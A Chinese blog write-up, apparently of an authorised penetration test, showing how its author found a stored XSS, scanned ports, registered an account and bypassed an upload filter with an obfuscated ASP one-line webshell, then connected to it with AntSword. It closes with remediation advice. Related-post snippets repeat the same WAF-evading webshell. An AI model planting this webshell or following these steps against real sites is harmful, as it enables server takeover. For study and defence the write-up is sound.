记一次有意思的文件上传

最新推荐文章于 2024-01-02 10:53:48 发布
最新推荐文章于 2024-01-02 10:53:48 发布
阅读量673 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuteer_xu/article/details/106678683
版权

本文作者:某小六 (Ms08067安全实验室SRSP TEAM)

有意思的文件上传开始

0x01文件上传漏洞的概念

由于站点对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。

0x02 Getshell之路

1.寻找漏洞

打开授权测试网站,发现页面功能单一(登记、查询),

登记处存在存储型xss

payload:<svg/onload = alert(1);>

当页面所有的功能模块测试完之后,我们可以扫目录、扫端口

2.御剑梭哈

①.扫目录,线程过高、ip被ban…

②.使用御剑扫描端口,发现此站点开放了许多端口(此工具适用于快速发现目标ip是否开放了很多端口,像下图这种情况,建议拿nmap进行端口扫描,来发现更多开放的端口)(真实ip,未做CDN)

nmap扫描的结果

盲猜ssh口令爆破不出来(超级弱口令爆破工具(自带字典)…

3.测试目的ip其他端口

①.打开 xx.xx.xx.xx:8088 首页长这个样子,啥也没有

②.点击左上角登录按钮,跳转到用户登录页面,测试admin/admin admin/123456 (猜想:用户命名规则、密码组成规则)

③.通过查看网页源代码,查看相关js文件,得到修改密码的url

填写表单并提交,提示如下信息,放弃爆破弱口令…

④.手动创建一个账号【狗头】

然后登录

⑤.找到上传点,测试文件上传

⑥.服务器对上传内容有过滤(发现相关恶意代码,直接拦截),如果直接上传asp 一句话木马(<%eval request("cmd")%>),会被弃包,go不过去

所以这里使用加密的webshell(代码来源百度,现用现搜)

<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function
Execute MorfiCoder(")/*/z/*/(tseuqer lave")
%>

上传成功

⑦.使用蚁剑连接

(ps:或者直接上传冰蝎自带的asp马)

0x03 漏洞危害&&修复

①.漏洞危害

(1)攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁;(2)攻击者可上传可执行的WebShell(如php、jsp、asp类型的木马病毒),或者利用目录跳转上传gif、html、config文件,覆盖原有的系统文件,到达获取系统权限的目的。

②.修复建议

(1)对上传文件格式进行严格校验及安全扫描,防止上传恶意脚本文件;

 

(2)设置权限限制,禁止上传目录的执行权限;

 

(3)严格限制可上传的文件类型;

 

(4)严格限制上传的文件路径。

 

(5)文件扩展名服务端白名单校验。

 

(6)文件内容服务端校验。

 

(7)上传文件重命名。

 

(8)隐藏上传文件路径。

扫描下方二维码加入Web安全攻防星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!


目前20000+人已关注加入我们


Ms08067安全实验室
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
有意思js程序 分享(看文件大小)
02-05
有意思js程序 分享(看文件大小)有意思js程序 分享(看文件大小)有意思js程序 分享(看文件大小)
一次SpringBoot文件上传
qq_31404603的博客
03-15 176
public Response test(@RequestParam("file")MultipartFile file){ //检测上传文件是否为空 if (file.isEmpty()){ response.setData("禁止上传空文件"); return response; } ...
实战|一次文件上传绕过
公众号:乌云安全
05-14 629
hello 大家好给大家介绍接口上传绕过,同事发来一个网站说有很多漏洞于是故事就由此拉开 (由于网站漏洞还未修复,敏感信息全打马赛克,仅提供绕过思路) 网站有登录界面,用同事发来的账号密码直接登录 进入后发现已经被打上xss 在照片这里发现了上传点 开始上传文件burp抓包,把后缀jsp试试 返回包提升无法上传jsp和html文件 我们把后缀改成jspx试试,发现返回200 网站这边提示格式不对,这难道是..
实战|一次有趣的文件上传绕过getshell
MachineGunJoe666
06-13 107
录一下某次授权的渗透测试,感觉思路还是挺不错的,所以录一下,有些截图不全,开始之前,需要对环境进行一个简单的描述,由于这次目标是一个传统行业,人员整体安全意识可能比较差,所以前期准备了邮件信息收集和钓鱼,另外不清楚目标服务器是不是做了变态的设置,信一直发不过去,之后对邮件服务器添加了spf和dkim录,信才发了过去,看样子目标部署了邮件网关设备,这样的话钓鱼的成功率不太大,之后就钓鱼和web打点同时进行。
一次文件上传漏洞的修复过程
千寻的博客
03-10 574
程序员:开发完成文件上传功能,可以正常上传任意文件 hack测试:发现文件上传功能,没有做任何限制,导致可以上传脚本并执行 程序员:在前端使用js限制一下文件上传的后缀吧 hack测试:使用burp上传并提交,绕过js验证,还是可以利用上传脚本 程序员:在服务器限制一下文件上传的后缀`,禁止上传php\html等后缀 hacke测试:你的黑名单验证没有写全,可以上传php3后缀的文件 程序员:限制白名单,只允许上传png\gif文件 hacke测试:上传的时候用00截断,比如xx.php.png,上传之后变
一次有意思的业务实现 → 单向关注是关注,双向关注则成好友.doc
07-08
本文通过一个有趣的例子——"一次有意思的业务实现 → 单向关注是关注,双向关注则成好友",探讨了一个具体的业务需求:当两个用户互相关注时,他们应该成为好友。这个需求涉及到两个关键数据表:关注关系表`tbl_...
thrift 一个有意思的特性:Class名称无关性
06-17
thrift 一个有意思的特性:Class名称无关性
案例分析:一次比较有意思的故障处理
10-21
查看中中CRS的路由表,发现中中CRS的默认路由竟是从中南学习过来的OSPF,而正常应该是从D1路由器学习过来的EBGP路由。另一种方法就是在中中CRS建立指向D1路由器的默认路由,这种...案例分析:一次比较有意思的故障处理
完全解决蚁剑{“code“:“ECONNRESET“,“errno“:“ECONNRESET“,“syscall“:“read“}和哥斯拉连接fail的问题
最新发布
weixin_62843906的博客
01-02 1928
如果没有开系统代理 ,那就是wifi的问题,看看自己是否连接了公司的无线网或者是校园网,因为一般像这种企业级的wifi都会在顶部做一些防护手段来保证安全性,就比如说放置一些安全设备,这也是大家经常发现照着教程一步一步来的但是最后却总是失败的具体原因。但是蚁剑却连接不上,总是出现{"code":"ECONNRESET","errno":"ECONNRESET","syscall":"read"}这种报错,甚至离谱的是有时候明明已经连接上了但还是会出现这种错误。网上给出的解决办法大概率大多数都是不管用的。
复现assert和eval成功连接或失败连接蚁剑的原因
m0_49137360的博客
07-23 5672
一句话木马
完美解决蚁剑{“code“:“econnreset“,“errno“:“econnreset“,“syscall“:“read“}
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-10 5912
蚁剑使用出现{"code":"econnreset","errno":"econnreset","syscall":"read"},向服务发送一个请求后有返回,但是服务返回后过会出现[Error: read ECONNRESET] code: ‘ECONNRESET’, errno: ‘ECONNRESET’, syscall: ‘read’,不知道是什么原因,网上的答案大致是socket关闭后,还后续做了读操作。可是实在想不明白咋出现的,有童鞋遇到过吗?可能原因有哪些呢? 一开始还以为是地址写错了,后面发
web漏洞 总结
YouthBelief的博客
10-10 1018
小迪WEB一、SQL1.sql注入原理2.sql注入的种类3.SQL注入的绕过 (待补充)sql注入流程判断数据库类型的语句写入webshell的条件如果你在的目录没有执行权限怎么办?(待补充)sql注入的条件into outfile函数作用xp_cmdshell了解过哪些数据库的sql注入,怎么快速判断属于哪个数据库?时间延时的原理?sleep()不能用怎么办http头注入有了解吗?sql注入的防护方法order by 注入了解吗?二、使用步骤1.引入库2.读入数据 WEB 一、SQL 1.sql注入原
文件上传
qq_40806924的博客
08-14 185
一、文件上传漏洞描述 1.1漏洞原理 网站的上传功能没有进行严格的限制,存在任意文件上传漏洞,容易被上传恶意脚本 1.2漏洞危害 攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁影响等 攻击者可上传可执行的Webshell(php,jsp,asp,aspx等类型脚本木马),获取利用目录跳转上传html,gif,config覆盖系统原有的文件,达到获取系统权限的目的。 1.3修复建议 1.对上传文件格式进行严格校验及安全扫描,防止上传恶意脚本文件 2.设置权限限制,禁止上传
蚁剑使用出现 Error {“address“:“47.98.50.28“,“code“:“EACCES“,“errno“:“EACCES“,“port“:80,“syscall“:“connect“
weixin_43886198的博客
08-16 2067
蚁剑使用出现{“address”:“127.0.0.1”,“code”:“ECONNREFUSED”,“errno”:“ECONNREFUSED”,“port”:8080,“syscall”:“connect”}
过安全狗一句话
dibodang1423的博客
11-02 263
<% Function MorfiCoder(Code) MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) End Function Execute MorfiCoder(")/*/Code/*/(tseuqer lave") %> 转载于:https://www.cnblogs.co...
一句话
xiaoshan812613234的专栏
12-15 924
ASP、ASPX、PHP原生态无污染一句话 ; ; 稍微改造的一句话: ASP: 1 2 3 4 5 6 Function MorfiCode(Code)     MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf) End Functi
史上最全的一句话木马
热门推荐
V
07-30 1万+
史上最全一句话木马PHP普通一句话PHP系列过狗一句话PHP过狗几个变性的php--过防火墙phpv9 高版本拿shellASPasp 一句话ASP过安全狗一句话ASPX系列aspx一句话JSP过护卫神的插入一句话容易爆错一句话木马到两句话木马的转型!一句话免杀:一:变形法支持变异菜刀连接以过安全狗,过啊D 文件扫描的一句话ASPASPASPX大家伙 把你们手中好的发出来共享下吧 别藏着了 PHP...
Java写一段有意思的代码
03-07
很高兴回答你的问题。以下是一段有趣的 Java 代码,它可以生成一个随机的密码,并将其输出到控制台上: import java.util.Random; public class PasswordGenerator { public static void main(String[] args) { String password = generatePassword(); System.out.println("Your password is: " + password); } public static String generatePassword() { String chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_+"; StringBuilder sb = new StringBuilder(); Random random = new Random(); for (int i = ; i < 10; i++) { int index = random.nextInt(chars.length()); sb.append(chars.charAt(index)); } return sb.toString(); } } 希望这段代码能够为你带来一些乐趣!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值